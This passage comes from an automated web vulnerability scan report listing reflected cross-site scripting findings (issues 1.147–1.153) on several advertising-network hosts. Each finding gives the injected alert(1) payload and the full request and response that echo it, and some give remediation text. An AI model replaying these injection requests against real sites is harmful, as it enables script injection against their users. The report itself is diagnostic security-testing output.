P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.21
Set-Cookie: __tuid=2298699369738581740; expires=Sat, 09-Apr-2016 17:41:22 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543682.054165088407; expires=Tue, 12-Apr-2011 17:41:22 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
t%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,&e7246"><script>alert(1)</script>f269b65bb7d=1http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993" target="_blank">
...[SNIP]...
1.147. http://y.cdn.adblade.com/imps.php [tpUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The value of the tpUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70367"><script>alert(1)</script>fea2373bb9f was submitted in the tpUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,70367"><script>alert(1)</script>fea2373bb9f HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:21 GMT
Expires: Mon, 11 Apr 2011 17:41:21 GMT
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.26
Set-Cookie: __tuid=2298699369259597370; expires=Sat, 09-Apr-2016 17:41:21 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543681.832680212853; expires=Tue, 12-Apr-2011 17:41:21 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,70367"><script>alert(1)</script>fea2373bb9fhttp://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993" target="_blank">
...[SNIP]...
1.148. http://adserving.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b5bb'-alert(1)-'7b2cca80406 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1836970&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=6b5bb'-alert(1)-'7b2cca80406

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:02:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:02:16 GMT
Content-Length: 425

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1836970&referrer=http://www.google.com/search%3Fhl=en%26q=6b5bb'-alert(1)-'7b2cca80406&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1836970%26referrer%3Dhttp%3A%2F%2Fwww.foxnews.com%2Fpolitics%2F
...[SNIP]...
1.149. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6e43"-alert(1)-"154bb4aae5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d6e43"-alert(1)-"154bb4aae5d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:24 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA2CE391FB899591A7EDF0BA5B76934F; Path=/
Connection: keep-alive
Content-Length: 8305


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=d6e43"-alert(1)-"154bb4aae5d",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.de
...[SNIP]...
1.150. http://bh.contextweb.com/bh/sync/admeld [V cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be1f9'-alert(1)-'3ba314679b8 was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:51 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 218
Date: Mon, 11 Apr 2011 16:31:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8&_segment=2%7CwOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8%7C"/>
...[SNIP]...
1.151. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.foxnews/tier2_031010

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a52cd"%3balert(1)//cff7d8c4d5c was submitted in the cli cookie. This input was echoed as a52cd";alert(1)//cff7d8c4d5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878;env=ifr;ord1=280882;cmpgurl=? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582ba52cd"%3balert(1)//cff7d8c4d5c; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:21 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:21 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:21 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 18-Apr-2011 16:21:21 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 00:21:21 GMT
Content-Length: 8007

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f3c48b4c0582ba52cd";alert(1)//cff7d8c4d5c&seg_code=noseg&ord=1302538881",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...
1.152. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c259c"><script>alert(1)</script>70b3c2b66bd was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ec259c"><script>alert(1)</script>70b3c2b66bd

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA0NDAxNjgzLCAgbmV0d29yazogICAgICAidHVybiIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMiIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiOGQ2MmMzZTEtY2E3Mi00MTQ2LTljYWYtZDM5Y2FiM2Q2OGI0IiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZWMyNTljIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+NzBiM2MyYjY2YmQiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICI4ZDYyYzNlMS1jYTcyLTQxNDYtOWNhZi1kMzljYWIzZDY4YjQiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMjQsICBhY2NvdW50X2lkOiAgIDU0LCAgbmV0d29ya19uYW1lOiAiVHVybiIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS4zNyIsICBmZWNwbTogICAgICAgICIxLjM3IiwgIGZpbGw6ICAgICAgICAgIjEzLjYzIiwgIHBsYWNlbWVudDogICAgInBvbGl0aWNzLWJvdHRvbSIsICBydWxlOiAgICAgICAgICJwb2xpdGljcy1ib3R0b20iLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2MzA0OSwgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE5NzE4MSwgImJ1eSI6NTAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTU4MDgsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyODk3LCAiYnV5IjoxODksImxwIjoiaHR0cDovL3d3dy5ob21lZGVwb3QuY29tLyIsImFuIjoiSG9tZSBEZXBvdCIsInN0YXR1cyI6IjAuODkiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI5NzksICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzEifQ==
Content-Length: 2010
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:27 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ec259c"><script>alert(1)</script>70b3c2b66bd&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.153. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25824"><script>alert(1)</script>9bc617e1123 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e25824"><script>alert(1)</script>9bc617e1123

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA0NDAxNjgzLCAgbmV0d29yazogICAgICAidHVybiIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMiIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZjAxZTAzMGYtZjAxNi00YTQ3LTg2NjQtMzlhOGE5NDhiOTBkIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZTI1ODI0Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+OWJjNjE3ZTExMjMiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICJmMDFlMDMwZi1mMDE2LTRhNDctODY2NC0zOWE4YTk0OGI5MGQiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMjQsICBhY2NvdW50X2lkOiAgIDU0LCAgbmV0d29ya19uYW1lOiAiVHVybiIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS4zNyIsICBmZWNwbTogICAgICAgICIxLjM3IiwgIGZpbGw6ICAgICAgICAgIjEzLjYzIiwgIHBsYWNlbWVudDogICAgInBvbGl0aWNzLWJvdHRvbSIsICBydWxlOiAgICAgICAgICJwb2xpdGljcy1ib3R0b20iLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2MzA0OSwgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE5NzE4MSwgImJ1eSI6NTAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTU4MDgsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyODk3LCAiYnV5IjoxODksImxwIjoiaHR0cDovL3d3dy5saHcuY29tLyIsImFuIjoiTGVhZGluZyBIb3RlbHMgb2YgdGhlIFdvcmxkIiwic3RhdHVzIjoiMC4wNCIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk3OSwgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDgifQ==
Content-Length: 2010
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:26 GMT
Connection: close

<html>
